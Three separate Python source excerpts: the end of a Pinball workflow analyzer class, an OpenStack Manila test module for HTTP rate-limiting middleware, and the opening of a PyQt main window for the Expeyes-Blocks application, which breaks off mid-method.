        tokens = store.read_archived_tokens(
            name_prefix=name.get_instance_prefix())
        self._filter_job_tokens(tokens)
    def _read_tokens_from_parser_params(self):
        """Read archived job tokens from the PinballConfig.PARSER_PARAMS.
        """
        config_parser = load_parser_with_caller(PinballConfig.PARSER,
                                                PinballConfig.PARSER_PARAMS,
                                                ParserCaller.ANALYZER)
        tokens = config_parser.get_workflow_tokens(self._workflow)
        self._filter_job_tokens(tokens)
    def _read_tokens_from_client(self, client):
        """Read archived job tokens from the client.
        Args:
            client: The client to read tokens from.
        """
        name = Name(workflow=self._workflow, instance=self._instance)
        query = Query(namePrefix=name.get_workflow_prefix())
        request = QueryRequest(queries=[query])
        response = client.query(request)
        assert len(response.tokens) == 1
        tokens = response.tokens[0]
        self._filter_job_tokens(tokens)
        self._filter_event_tokens(tokens)
    def get_tokens(self):
        """Export all internally stored tokens.
        Returns:
            The list of tokens after all transformations performed by the
            analyzer.
        """
        result = []
        for job in self._jobs.values():
            # Jobs are re-exported in the WAITING state with their original
            # priorities.
            name = Name(workflow=self._workflow, instance=self._instance,
                        job_state=Name.WAITING_STATE, job=job.name)
            data = pickle.dumps(job)
            token = Token(name=name.get_job_token_name(),
                          priority=self._job_priorities[job.name],
                          data=data)
            result.append(token)
        result.extend(self.get_new_event_tokens())
        return result
    def get_new_event_tokens(self):
        """Export new event tokens.
        Returns:
            The list of new event tokens after all transformations performed by
            the analyzer.
        """
        result = []
        for event_name, event in self._new_events.items():
            data = pickle.dumps(event)
            token = Token(name=event_name, data=data)
            result.append(token)
        return result
    def _find_descendants(self, job_name):
        """Find direct and indirect descendants of a job.
        Args:
            job_name: The name of the job whose descendants should be computed.
        Returns:
            The set of job descendants.  Includes job_name itself.
        """
        def _dfs(current, visited):
            if not current in visited:
                visited.add(current)
                for child in current.outputs:
                    _dfs(self._jobs[child], visited)
        visited = set()
        _dfs(self._jobs[job_name], visited)
        result = set()
        for job in visited:
            result.add(job.name)
        return result
    def _generate_missing_events(self, job_names):
        """Generate external events required to run all jobs in a set.
        For a set of jobs (a subset of all jobs in the workflow), produce
        events satisfying upstream dependencies external to that set. E.g.,
        for job dependency structure like this:
        A1 A2
        | /
        B1 B2
        |
        C1 C2
        | /
        D1
        and job_names = (C1, D1) we would generate events satisfying the
        following deps: B1->C1, C2->D1.
        Args:
            job_names: The set of job names whose external deps are to be
                satisfied by the generated events.
        """
        input_prefixes = set()
        for job_name in job_names:
            job = self._jobs[job_name]
            for job_input in job.inputs:
                # Only inputs coming from outside the selected set need a
                # synthetic event.
                if job_input not in job_names:
                    name = Name(workflow=self._workflow,
                                instance=self._instance,
                                job=job_name,
                                input_name=job_input,
                                event='poison_%d' % len(input_prefixes))
                    input_prefix = name.get_input_prefix()
                    if input_prefix not in input_prefixes:
                        input_prefixes.add(input_prefix)
                        event_token_name = name.get_event_token_name()
                        # Don't shadow an event that already exists.
                        if not event_token_name in self._existing_events:
                            self._new_events[
                                name.get_event_token_name()] = Event(
                                    'analyzer')
    def poison(self, roots):
        """Poison the workflow instance at specified root jobs.
        Poisoning is a process of choosing a subset of jobs to run based on
        the dependencies. Only jobs that depend directly or indirectly on any
        job in the root set will be executed. Poisoning will generate events
        for dependencies which are not satisfied by the roots or their
        dependents.
        Args:
            roots: The list of job names which are roots of the poisoning.
        """
        descendants = set()
        for root in roots:
            jobs = self._find_descendants(root)
            descendants = descendants.union(jobs)
        self._generate_missing_events(descendants)
    def change_instance(self, instance):
        """Move all tokens to a specific instance."""
        self._instance = instance
        # Re-key the synthesized events under the new instance name.
        new_events = {}
        for event_name, event in self._new_events.items():
            name = Name.from_event_token_name(event_name)
            name.instance = instance
            new_events[name.get_event_token_name()] = event
        self._new_events = new_events
    def clear_job_histories(self):
        """Remove histories from all job tokens."""
        for job in self._jobs.values():
            job.history = []
| |
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests dealing with HTTP rate-limiting.
"""
from oslo_serialization import jsonutils
import six
from six import moves
from six.moves import http_client
import webob
from manila.api.v1 import limits
from manila.api import views
import manila.context
from manila import test
# Rate limits shared by the tests below: HTTP verb, human-readable URI,
# matching regex, allowed requests, and the time unit they apply to.
TEST_LIMITS = [
    limits.Limit("GET", "/delayed", "^/delayed", 1, limits.PER_MINUTE),
    limits.Limit("POST", "*", ".*", 7, limits.PER_MINUTE),
    limits.Limit("POST", "/shares", "^/shares", 3, limits.PER_MINUTE),
    limits.Limit("PUT", "*", "", 10, limits.PER_MINUTE),
    limits.Limit("PUT", "/shares", "^/shares", 5, limits.PER_MINUTE),
]
# XML namespaces used by the limits representations.
NS = {
    'atom': 'http://www.w3.org/2005/Atom',
    'ns': 'http://docs.openstack.org/common/api/v1.0'
}
class BaseLimitTestSuite(test.TestCase):
    """Base test suite which provides relevant stubs and time abstraction."""
    def setUp(self):
        super(BaseLimitTestSuite, self).setUp()
        # Virtual clock consumed by limits.Limit._get_time via the stub.
        self.time = 0.0
        self.mock_object(limits.Limit, "_get_time", self._get_time)
        # Tests populate this with {'limit': {...}, 'in_use': {...}} maps.
        self.absolute_limits = {}
        def stub_get_project_quotas(context, project_id, usages=True):
            # Reshape absolute_limits into the nested per-resource structure
            # returned by the real QUOTAS.get_project_quotas.
            quotas = {}
            for mapping_key in ('limit', 'in_use'):
                for k, v in self.absolute_limits.get(mapping_key, {}).items():
                    if k not in quotas:
                        quotas[k] = {}
                    quotas[k].update({mapping_key: v})
            return quotas
        self.mock_object(manila.quota.QUOTAS, "get_project_quotas",
                         stub_get_project_quotas)
    def _get_time(self):
        """Return the "time" according to this test suite."""
        return self.time
class LimitsControllerTest(BaseLimitTestSuite):
    """Tests for `limits.LimitsController` class."""
    def setUp(self):
        """Run before each test."""
        super(LimitsControllerTest, self).setUp()
        self.controller = limits.create_resource()
    def _get_index_request(self, accept_header="application/json"):
        """Build a GET / request routed to the controller's "index" action."""
        request = webob.Request.blank("/")
        request.accept = accept_header
        # Fake the routing middleware's output so the controller dispatches
        # to its "index" action without a real router in front of it.
        request.environ["wsgiorg.routing_args"] = (None, {
            "action": "index",
            "controller": "",
        })
        context = manila.context.RequestContext('testuser', 'testproject')
        request.environ["manila.context"] = context
        return request
    def _populate_limits(self, request):
        """Put limit info into a request."""
        # The controller reads its rate limits from this environ key.
        _limits = [
            limits.Limit("GET", "*", ".*", 10, 60).display(),
            limits.Limit("POST", "*", ".*", 5, 60 * 60).display(),
            limits.Limit("GET", "changes-since*", "changes-since",
                         5, 60).display(),
        ]
        request.environ["manila.limits"] = _limits
        return request
    def test_empty_index_json(self):
        """Test getting empty limit details in JSON."""
        request = self._get_index_request()
        response = request.get_response(self.controller)
        expected = {
            "limits": {
                "rate": [],
                "absolute": {},
            },
        }
        body = jsonutils.loads(response.body)
        self.assertEqual(expected, body)
    def test_index_json(self):
        """Test getting limit details in JSON."""
        request = self._get_index_request()
        request = self._populate_limits(request)
        # Quota values consumed by the stubbed get_project_quotas in
        # BaseLimitTestSuite; they surface as the "absolute" limits below.
        self.absolute_limits = {
            'limit': {
                'shares': 11,
                'gigabytes': 22,
                'snapshots': 33,
                'snapshot_gigabytes': 44,
                'share_networks': 55,
            },
            'in_use': {
                'shares': 3,
                'gigabytes': 4,
                'snapshots': 5,
                'snapshot_gigabytes': 6,
                'share_networks': 7,
            },
        }
        response = request.get_response(self.controller)
        # Rate limits sharing a uri/regex pair are grouped under one entry;
        # GET and POST on "*"/".*" end up in the same "limit" list.
        expected = {
            "limits": {
                "rate": [
                    {
                        "regex": ".*",
                        "uri": "*",
                        "limit": [
                            {
                                "verb": "GET",
                                "next-available": "1970-01-01T00:00:00Z",
                                "unit": "MINUTE",
                                "value": 10,
                                "remaining": 10,
                            },
                            {
                                "verb": "POST",
                                "next-available": "1970-01-01T00:00:00Z",
                                "unit": "HOUR",
                                "value": 5,
                                "remaining": 5,
                            },
                        ],
                    },
                    {
                        "regex": "changes-since",
                        "uri": "changes-since*",
                        "limit": [
                            {
                                "verb": "GET",
                                "next-available": "1970-01-01T00:00:00Z",
                                "unit": "MINUTE",
                                "value": 5,
                                "remaining": 5,
                            },
                        ],
                    },
                ],
                "absolute": {
                    "totalSharesUsed": 3,
                    "totalShareGigabytesUsed": 4,
                    "totalShareSnapshotsUsed": 5,
                    "totalSnapshotGigabytesUsed": 6,
                    "totalShareNetworksUsed": 7,
                    "maxTotalShares": 11,
                    "maxTotalShareGigabytes": 22,
                    "maxTotalShareSnapshots": 33,
                    "maxTotalSnapshotGigabytes": 44,
                    "maxTotalShareNetworks": 55,
                },
            },
        }
        body = jsonutils.loads(response.body)
        self.assertEqual(expected, body)
    def _populate_limits_diff_regex(self, request):
        """Put limit info with identical URIs but distinct regexes."""
        _limits = [
            limits.Limit("GET", "*", ".*", 10, 60).display(),
            limits.Limit("GET", "*", "*.*", 10, 60).display(),
        ]
        request.environ["manila.limits"] = _limits
        return request
    def test_index_diff_regex(self):
        """Test getting limit details in JSON."""
        request = self._get_index_request()
        request = self._populate_limits_diff_regex(request)
        response = request.get_response(self.controller)
        # Same uri but different regex must NOT be merged into one entry.
        expected = {
            "limits": {
                "rate": [
                    {
                        "regex": ".*",
                        "uri": "*",
                        "limit": [
                            {
                                "verb": "GET",
                                "next-available": "1970-01-01T00:00:00Z",
                                "unit": "MINUTE",
                                "value": 10,
                                "remaining": 10,
                            },
                        ],
                    },
                    {
                        "regex": "*.*",
                        "uri": "*",
                        "limit": [
                            {
                                "verb": "GET",
                                "next-available": "1970-01-01T00:00:00Z",
                                "unit": "MINUTE",
                                "value": 10,
                                "remaining": 10,
                            },
                        ],
                    },
                ],
                "absolute": {},
            },
        }
        body = jsonutils.loads(response.body)
        self.assertEqual(expected, body)
    def _test_index_absolute_limits_json(self, expected):
        request = self._get_index_request()
        response = request.get_response(self.controller)
        body = jsonutils.loads(response.body)
        self.assertEqual(expected, body['limits']['absolute'])
    def test_index_ignores_extra_absolute_limits_json(self):
        # Quota keys with no known display name must be dropped, not echoed.
        self.absolute_limits = {
            'in_use': {'unknown_limit': 9000},
            'limit': {'unknown_limit': 9001},
        }
        self._test_index_absolute_limits_json({})
class TestLimiter(limits.Limiter):
    """Limiter subclass used to verify custom limiter-class selection."""
    pass
class LimitMiddlewareTest(BaseLimitTestSuite):
    """Tests for the `limits.RateLimitingMiddleware` class."""
    @webob.dec.wsgify
    def _empty_app(self, request):
        """Do-nothing WSGI app."""
        pass
    def setUp(self):
        """Prepare middleware for use through fake WSGI app."""
        super(LimitMiddlewareTest, self).setUp()
        # One GET per minute; the limiter class is named by dotted path so
        # the middleware's dynamic class loading is exercised too.
        _limits = '(GET, *, .*, 1, MINUTE)'
        self.app = limits.RateLimitingMiddleware(self._empty_app, _limits,
                                                 "%s.TestLimiter" %
                                                 self.__class__.__module__)
    def test_limit_class(self):
        """Test that middleware selected correct limiter class."""
        # Use assertIsInstance instead of a bare assert: plain asserts are
        # stripped under ``python -O`` and give poorer failure messages.
        self.assertIsInstance(self.app._limiter, TestLimiter)
    def test_good_request(self):
        """Test successful GET request through middleware."""
        request = webob.Request.blank("/")
        response = request.get_response(self.app)
        self.assertEqual(200, response.status_int)
    def test_limited_request_json(self):
        """Test a rate-limited (413) GET request through middleware."""
        # First request fits within the 1/minute limit...
        request = webob.Request.blank("/")
        response = request.get_response(self.app)
        self.assertEqual(200, response.status_int)
        # ...the second is rejected with 413 plus a Retry-After header.
        request = webob.Request.blank("/")
        response = request.get_response(self.app)
        self.assertEqual(413, response.status_int)
        self.assertIn('Retry-After', response.headers)
        retry_after = int(response.headers['Retry-After'])
        self.assertAlmostEqual(retry_after, 60, 1)
        body = jsonutils.loads(response.body)
        expected = "Only 1 GET request(s) can be made to * every minute."
        value = body["overLimitFault"]["details"].strip()
        self.assertEqual(expected, value)
class LimitTest(BaseLimitTestSuite):
    """Tests for the `limits.Limit` class."""

    def test_GET_no_delay(self):
        """A 1-per-second GET limit imposes no delay on its first hit."""
        rate_limit = limits.Limit("GET", "*", ".*", 1, 1)
        self.assertIsNone(rate_limit("GET", "/anything"))
        self.assertEqual(0, rate_limit.next_request)
        self.assertEqual(0, rate_limit.last_request)

    def test_GET_delay(self):
        """A second immediate GET is delayed; waiting clears the delay."""
        rate_limit = limits.Limit("GET", "*", ".*", 1, 1)
        self.assertIsNone(rate_limit("GET", "/anything"))
        wait = rate_limit("GET", "/anything")
        self.assertEqual(1, wait)
        self.assertEqual(1, rate_limit.next_request)
        self.assertEqual(0, rate_limit.last_request)
        # Advance the virtual clock past the window; the limit lifts.
        self.time += 4
        self.assertIsNone(rate_limit("GET", "/anything"))
        self.assertEqual(4, rate_limit.next_request)
        self.assertEqual(4, rate_limit.last_request)
class ParseLimitsTest(BaseLimitTestSuite):
    """Test default limits parser.
    Tests for the default limits parser in the in-memory
    `limits.Limiter` class.
    """
    def test_invalid(self):
        """Test that parse_limits() handles invalid input correctly."""
        self.assertRaises(ValueError, limits.Limiter.parse_limits,
                          ';;;;;')
    def test_bad_rule(self):
        """Test that parse_limits() handles bad rules correctly."""
        self.assertRaises(ValueError, limits.Limiter.parse_limits,
                          'GET, *, .*, 20, minute')
    def test_missing_arg(self):
        """Test that parse_limits() handles missing args correctly."""
        self.assertRaises(ValueError, limits.Limiter.parse_limits,
                          '(GET, *, .*, 20)')
    def test_bad_value(self):
        """Test that parse_limits() handles bad values correctly."""
        self.assertRaises(ValueError, limits.Limiter.parse_limits,
                          '(GET, *, .*, foo, minute)')
    def test_bad_unit(self):
        """Test that parse_limits() handles bad units correctly."""
        self.assertRaises(ValueError, limits.Limiter.parse_limits,
                          '(GET, *, .*, 20, lightyears)')
    def test_multiple_rules(self):
        """Test that parse_limits() handles multiple rules correctly."""
        try:
            parsed = limits.Limiter.parse_limits(
                '(get, *, .*, 20, minute);'
                '(PUT, /foo*, /foo.*, 10, hour);'
                '(POST, /bar*, /bar.*, 5, second);'
                '(Say, /derp*, /derp.*, 1, day)')
        except ValueError as e:
            # BUG FIX: the original called six.text_types(e) -- that
            # attribute does not exist (it is six.text_type), so a parse
            # failure raised AttributeError instead of failing cleanly.
            # self.fail() also replaces the bare `assert False`, which is
            # stripped under ``python -O``.
            self.fail(six.text_type(e))
        # Make sure the number of returned limits are correct
        self.assertEqual(4, len(parsed))
        # Check all the verbs (verbs are upper-cased by the parser)...
        expected = ['GET', 'PUT', 'POST', 'SAY']
        self.assertEqual(expected, [t.verb for t in parsed])
        # ...the URIs...
        expected = ['*', '/foo*', '/bar*', '/derp*']
        self.assertEqual(expected, [t.uri for t in parsed])
        # ...the regexes...
        expected = ['.*', '/foo.*', '/bar.*', '/derp.*']
        self.assertEqual(expected, [t.regex for t in parsed])
        # ...the values...
        expected = [20, 10, 5, 1]
        self.assertEqual(expected, [t.value for t in parsed])
        # ...and the units...
        expected = [limits.PER_MINUTE, limits.PER_HOUR,
                    limits.PER_SECOND, limits.PER_DAY]
        self.assertEqual(expected, [t.unit for t in parsed])
class LimiterTest(BaseLimitTestSuite):
    """Tests for the in-memory `limits.Limiter` class."""
    def setUp(self):
        """Run before each test."""
        super(LimiterTest, self).setUp()
        # user3 gets an empty (i.e. unrestricted) per-user limit set.
        userlimits = {'user:user3': ''}
        self.limiter = limits.Limiter(TEST_LIMITS, **userlimits)
    def _check(self, num, verb, url, username=None):
        """Check and yield results from checks."""
        for x in moves.range(num):
            yield self.limiter.check_for_delay(verb, url, username)[0]
    def _check_sum(self, num, verb, url, username=None):
        """Check and sum results from checks."""
        results = self._check(num, verb, url, username)
        return sum(item for item in results if item)
    def test_no_delay_GET(self):
        """Test no delay on GET for single call.
        Simple test to ensure no delay on a single call for a limit verb we
        didn't set.
        """
        delay = self.limiter.check_for_delay("GET", "/anything")
        self.assertEqual((None, None), delay)
    def test_no_delay_PUT(self):
        """Test no delay on single call.
        Simple test to ensure no delay on a single call for a known limit.
        """
        delay = self.limiter.check_for_delay("PUT", "/anything")
        self.assertEqual((None, None), delay)
    def test_delay_PUT(self):
        """Ensure 11th PUT will be delayed.
        Ensure the 11th PUT will result in a delay of 6.0 seconds until
        the next request will be granted.
        """
        expected = [None] * 10 + [6.0]
        results = list(self._check(11, "PUT", "/anything"))
        self.assertEqual(expected, results)
    def test_delay_POST(self):
        """Ensure 8th POST will be delayed.
        Ensure the 8th POST will result in a delay of 6.0 seconds until
        the next request will be granted.
        """
        expected = [None] * 7
        results = list(self._check(7, "POST", "/anything"))
        self.assertEqual(expected, results)
        expected = 60.0 / 7.0
        results = self._check_sum(1, "POST", "/anything")
        # BUG FIX: failUnlessAlmostEqual is the deprecated unittest alias
        # and was removed in Python 3; assertAlmostEqual is the same check.
        self.assertAlmostEqual(expected, results, 8)
    def test_delay_GET(self):
        """Ensure the 11th GET will result in NO delay."""
        expected = [None] * 11
        results = list(self._check(11, "GET", "/anything"))
        self.assertEqual(expected, results)
    def test_delay_PUT_shares(self):
        """Ensure PUT limits.
        Ensure PUT on /shares limits at 5 requests, and PUT elsewhere is still
        OK after 5 requests...but then after 11 total requests, PUT limiting
        kicks in.
        """
        # First 6 requests on PUT /shares
        expected = [None] * 5 + [12.0]
        results = list(self._check(6, "PUT", "/shares"))
        self.assertEqual(expected, results)
        # Next 5 request on PUT /anything
        expected = [None] * 4 + [6.0]
        results = list(self._check(5, "PUT", "/anything"))
        self.assertEqual(expected, results)
    # Backward-compatible alias for the old (misleading) test name, so any
    # external selection by name keeps working.
    test_delay_PUT_volumes = test_delay_PUT_shares
    def test_delay_PUT_wait(self):
        """Test limit handling.
        Ensure after hitting the limit and then waiting for the correct
        amount of time, the limit will be lifted.
        """
        expected = [None] * 10 + [6.0]
        results = list(self._check(11, "PUT", "/anything"))
        self.assertEqual(expected, results)
        # Advance time
        self.time += 6.0
        expected = [None, 6.0]
        results = list(self._check(2, "PUT", "/anything"))
        self.assertEqual(expected, results)
    def test_multiple_delays(self):
        """Ensure multiple requests still get a delay."""
        expected = [None] * 10 + [6.0] * 10
        results = list(self._check(20, "PUT", "/anything"))
        self.assertEqual(expected, results)
        self.time += 1.0
        expected = [5.0] * 10
        results = list(self._check(10, "PUT", "/anything"))
        self.assertEqual(expected, results)
    def test_user_limit(self):
        """Test user-specific limits."""
        self.assertEqual([], self.limiter.levels['user3'])
    def test_multiple_users(self):
        """Tests involving multiple users."""
        # User1
        expected = [None] * 10 + [6.0] * 10
        results = list(self._check(20, "PUT", "/anything", "user1"))
        self.assertEqual(expected, results)
        # User2
        expected = [None] * 10 + [6.0] * 5
        results = list(self._check(15, "PUT", "/anything", "user2"))
        self.assertEqual(expected, results)
        # User3 has an empty limit set, so is never throttled.
        expected = [None] * 20
        results = list(self._check(20, "PUT", "/anything", "user3"))
        self.assertEqual(expected, results)
        self.time += 1.0
        # User1 again
        expected = [5.0] * 10
        results = list(self._check(10, "PUT", "/anything", "user1"))
        self.assertEqual(expected, results)
        self.time += 1.0
        # User2 again
        expected = [4.0] * 5
        results = list(self._check(5, "PUT", "/anything", "user2"))
        self.assertEqual(expected, results)
class WsgiLimiterTest(BaseLimitTestSuite):
    """Tests for `limits.WsgiLimiter` class."""
    def setUp(self):
        """Run before each test."""
        super(WsgiLimiterTest, self).setUp()
        self.app = limits.WsgiLimiter(TEST_LIMITS)
    def _request_data(self, verb, path):
        """Get data describing a limit request verb/path."""
        # The WsgiLimiter expects a JSON body of the form
        # {"verb": ..., "path": ...}, encoded to bytes.
        return six.b(jsonutils.dumps({"verb": verb, "path": path}))
    def _request(self, verb, url, username=None):
        """Send request.
        Make sure that POSTing to the given url causes the given
        username to perform the given action. Make the internal rate
        limiter return delay and make sure that the WSGI app returns
        the correct response.
        """
        # A username, if given, is carried in the request path.
        if username:
            request = webob.Request.blank("/%s" % username)
        else:
            request = webob.Request.blank("/")
        request.method = "POST"
        request.body = self._request_data(verb, url)
        response = request.get_response(self.app)
        # 403 + X-Wait-Seconds means the limiter imposed a delay;
        # 204 means the request was within limits (returns None).
        if "X-Wait-Seconds" in response.headers:
            self.assertEqual(403, response.status_int)
            return response.headers["X-Wait-Seconds"]
        self.assertEqual(204, response.status_int)
    def test_invalid_methods(self):
        """Only POSTs should work."""
        for method in ["GET", "PUT", "DELETE", "HEAD", "OPTIONS"]:
            request = webob.Request.blank("/", method=method)
            response = request.get_response(self.app)
            self.assertEqual(405, response.status_int)
    def test_good_url(self):
        delay = self._request("GET", "/something")
        self.assertIsNone(delay)
    def test_escaping(self):
        delay = self._request("GET", "/something/jump%20up")
        self.assertIsNone(delay)
    def test_response_to_delays(self):
        # /delayed is limited to 1 GET/minute in TEST_LIMITS, so the second
        # probe reports a 60-second wait.
        delay = self._request("GET", "/delayed")
        self.assertIsNone(delay)
        delay = self._request("GET", "/delayed")
        self.assertEqual('60.00', delay)
    def test_response_to_delays_usernames(self):
        # Each username gets an independent limit bucket.
        delay = self._request("GET", "/delayed", "user1")
        self.assertIsNone(delay)
        delay = self._request("GET", "/delayed", "user2")
        self.assertIsNone(delay)
        delay = self._request("GET", "/delayed", "user1")
        self.assertEqual('60.00', delay)
        delay = self._request("GET", "/delayed", "user2")
        self.assertEqual('60.00', delay)
class FakeHttplibSocket(object):
    """Fake `http_client.HTTPResponse` replacement."""

    def __init__(self, response_string):
        """Buffer the canned response bytes in memory."""
        self._stream = six.BytesIO(six.b(response_string))

    def makefile(self, _mode, _other=None):
        """Hand back the in-memory buffer, as a real socket's makefile would."""
        return self._stream
class FakeHttplibConnection(object):
    """Fake `http_client.HTTPConnection`."""

    def __init__(self, app, host):
        """Remember the WSGI app and the host this fake connection targets."""
        self.app = app
        self.host = host

    def request(self, method, path, body="", headers=None):
        """Translate request to WSGI app.

        Requests made via this connection actually get translated and routed
        into our WSGI app; we then wait for the response and turn it back
        into an `http_client.HTTPResponse`.
        """
        req = webob.Request.blank(path)
        req.method = method
        req.headers = headers or {}
        req.host = self.host
        req.body = six.b(body)
        # Render the WSGI response as raw HTTP/1.0 wire text and re-parse it
        # through http_client so callers see a genuine HTTPResponse.
        raw = "HTTP/1.0 %s" % str(req.get_response(self.app))
        self.http_response = http_client.HTTPResponse(FakeHttplibSocket(raw))
        self.http_response.begin()

    def getresponse(self):
        """Return our generated response from the request."""
        return self.http_response
def wire_HTTPConnection_to_WSGI(host, app):
    """Wire HTTPConnection to WSGI app.

    Monkeypatches http_client.HTTPConnection so that connections to `host`
    are routed straight into the given WSGI app instead of a socket;
    connections to any other host are unaffected. May be called several
    times to map different hosts to different apps.

    :returns: the original HTTPConnection class, so the caller can restore
        the default behaviour afterwards.
    """
    class HTTPConnectionDecorator(object):
        """Factory that yields a fake connection for `host`, else the real one."""

        def __init__(self, wrapped):
            self.wrapped = wrapped

        def __call__(self, connection_host, *args, **kwargs):
            if connection_host != host:
                return self.wrapped(connection_host, *args, **kwargs)
            return FakeHttplibConnection(app, host)

    previous = http_client.HTTPConnection
    http_client.HTTPConnection = HTTPConnectionDecorator(previous)
    return previous
class WsgiLimiterProxyTest(BaseLimitTestSuite):
    """Tests for the `limits.WsgiLimiterProxy` class."""

    def setUp(self):
        """Set up HTTP/WSGI magic.

        Do some nifty HTTP/WSGI magic which allows for WSGI to be called
        directly by something like the `http_client` library.
        """
        super(WsgiLimiterProxyTest, self).setUp()
        self.app = limits.WsgiLimiter(TEST_LIMITS)
        self.oldHTTPConnection = wire_HTTPConnection_to_WSGI(
            "169.254.0.1:80", self.app)
        self.proxy = limits.WsgiLimiterProxy("169.254.0.1:80")

    def tearDown(self):
        # Undo the monkeypatch so later tests get the real HTTPConnection.
        http_client.HTTPConnection = self.oldHTTPConnection
        super(WsgiLimiterProxyTest, self).tearDown()

    def test_200(self):
        """A request under the limit yields neither delay nor error."""
        self.assertEqual((None, None),
                         self.proxy.check_for_delay("GET", "/anything"))

    def test_403(self):
        """A second hit on a 1-per-minute resource is rejected with details."""
        self.assertEqual((None, None),
                         self.proxy.check_for_delay("GET", "/delayed"))
        delay, error = self.proxy.check_for_delay("GET", "/delayed")
        expected = ("60.00", six.b("403 Forbidden\n\nOnly 1 GET request(s) "
                                   "can be made to /delayed every minute."))
        self.assertEqual(expected, (delay, error.strip()))
class LimitsViewBuilderTest(test.TestCase):
    # Tests for views.limits.ViewBuilder: converts raw rate-limit dicts and
    # quota mappings into the API's "limits" response document.
    def setUp(self):
        super(LimitsViewBuilderTest, self).setUp()
        self.view_builder = views.limits.ViewBuilder()
        # Raw rate-limit records as the middleware produces them; note the
        # epoch "resetTime" which the builder renders as ISO-8601.
        self.rate_limits = [{"URI": "*",
                             "regex": ".*",
                             "value": 10,
                             "verb": "POST",
                             "remaining": 2,
                             "unit": "MINUTE",
                             "resetTime": 1311272226},
                            {"URI": "*/shares",
                             "regex": "^/shares",
                             "value": 50,
                             "verb": "POST",
                             "remaining": 10,
                             "unit": "DAY",
                             "resetTime": 1311272226}]
        self.absolute_limits = {
            "limit": {
                "shares": 111,
                "gigabytes": 222,
                "snapshots": 333,
                "snapshot_gigabytes": 444,
                "share_networks": 555,
            },
            "in_use": {
                "shares": 65,
                "gigabytes": 76,
                "snapshots": 87,
                "snapshot_gigabytes": 98,
                "share_networks": 107,
            },
        }
    def test_build_limits(self):
        # 1311272226 epoch seconds == 2011-07-21T18:17:06Z (UTC).
        tdate = "2011-07-21T18:17:06Z"
        expected_limits = {
            "limits": {
                "rate": [
                    {"uri": "*",
                     "regex": ".*",
                     "limit": [{"value": 10,
                                "verb": "POST",
                                "remaining": 2,
                                "unit": "MINUTE",
                                "next-available": tdate}]},
                    {"uri": "*/shares",
                     "regex": "^/shares",
                     "limit": [{"value": 50,
                                "verb": "POST",
                                "remaining": 10,
                                "unit": "DAY",
                                "next-available": tdate}]}
                ],
                "absolute": {
                    "totalSharesUsed": 65,
                    "totalShareGigabytesUsed": 76,
                    "totalShareSnapshotsUsed": 87,
                    "totalSnapshotGigabytesUsed": 98,
                    "totalShareNetworksUsed": 107,
                    "maxTotalShares": 111,
                    "maxTotalShareGigabytes": 222,
                    "maxTotalShareSnapshots": 333,
                    "maxTotalSnapshotGigabytes": 444,
                    "maxTotalShareNetworks": 555,
                }
            }
        }
        output = self.view_builder.build(self.rate_limits,
                                         self.absolute_limits)
        self.assertDictMatch(expected_limits, output)
    def test_build_limits_empty_limits(self):
        # Empty inputs must yield the empty skeleton, not a KeyError.
        expected_limits = {"limits": {"rate": [], "absolute": {}}}
        abs_limits = {}
        rate_limits = []
        output = self.view_builder.build(rate_limits, abs_limits)
        self.assertDictMatch(expected_limits, output)
| |
#!/usr/bin/python
# -*- coding: utf-8; mode: python; indent-tabs-mode: t; tab-width:4 -*-
from __future__ import print_function
# NOTE: this module-level name shadows the ``license`` builtin; it is kept
# because the About dialog references it by this name.
license="""\
Copyright (C) 2017 Georges Khaznadar <georgesk@debian.org>
Application Expeyes-Blocks
This application may be used under the terms of the
GNU General Public License version 3.0 as published by
the Free Software Foundation, or, at your preference,
any later version of the same.
Expeyes-Blocks is built upon Qt4 GUI libraries, see "About Qt".
This application is provided AS IS with NO WARRANTY OF ANY KIND,
INCLUDING THE WARRANTY OF DESIGN, MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE.
"""
from version import version
import copy, re
from os.path import basename
from PyQt4.QtCore import QPoint, QRect, Qt, QSize, QString, \
QTimer, QFileInfo, SIGNAL, QByteArray, QStringList
from PyQt4.QtGui import QMainWindow, QApplication, \
QMessageBox, QFileDialog, QTextCursor
def _translate(context, text, disambig):
    """Shorthand for QApplication.translate (Python 2: coerces text to unicode)."""
    return QApplication.translate(context, unicode(text), disambig)
from templates.ui_blocks import Ui_MainWindow
from component import Component, InputComponent
from timecomponent import TimeComponent
from voltagecomponent import VoltageComponent
from transmitcomponent import TransmitComponent
from channelcomponent import ChannelComponent
import wizard
class BlockMainWindow(QMainWindow, Ui_MainWindow):
    """
    This class implements the main window of the Expeyes-Blocks
    application.
    """
    def __init__(self, parent=None):
        QMainWindow.__init__(self, parent)
        Ui_MainWindow.__init__(self)
        self.setupUi(self)
        # Give the block canvas 4/5 of the splitter, messages the rest.
        self.splitter.setSizes([4,1])
        self.loadComponents()
        self.connectSignals()
        self.fileName=None
        self.dirty="" # may become "*"
        # NOTE(review): the box model is stored on self.widget here, but
        # chooseBox()'s callback assigns self.boxModel instead — confirm
        # which attribute downstream consumers (wizard.compile_) read.
        self.widget.boxModel="expeyes-junior"
        self.warn(_translate("eyeBlocks.mainwindow","<span style='color:blue'>[Current targetted box]</span> %1",None).arg(self.widget.boxModel))
        return
    def loadComponents(self, path=None):
        # Populate the left-hand palette from the component resource list.
        # NOTE(review): the `path` parameter is currently unused.
        self.widget.clear()
        cList=Component.listFromRC()
        for c in cList:
            self.componentsList.newComponent(c)
        return
    def connectSignals(self):
        """
        connecting signals to methods
        """
        self.action_Quit.triggered.connect(self.close)
        self.actionSave.triggered.connect(self.save)
        self.actionSave_as.triggered.connect(self.saveAs)
        self.action_Open.triggered.connect(self.load)
        self.action_About.triggered.connect(self.about)
        self.actionAbout_Qt.triggered.connect(self.aboutQt)
        self.widget.blocksChanged.connect(self.makeDirty)
        self.action_Compile.triggered.connect(self.compile_)
        self.action_Run.triggered.connect(self.run)
        # chooseBox() returns a closure, so calling it here is intentional:
        # each action gets a callback bound to its model string.
        self.actionExpeyes_17.triggered.connect(self.chooseBox("expeyes-17"))
        self.actionExpeyes_Junior.triggered.connect(self.chooseBox("expeyes-junior"))
    def compile_(self):
        """
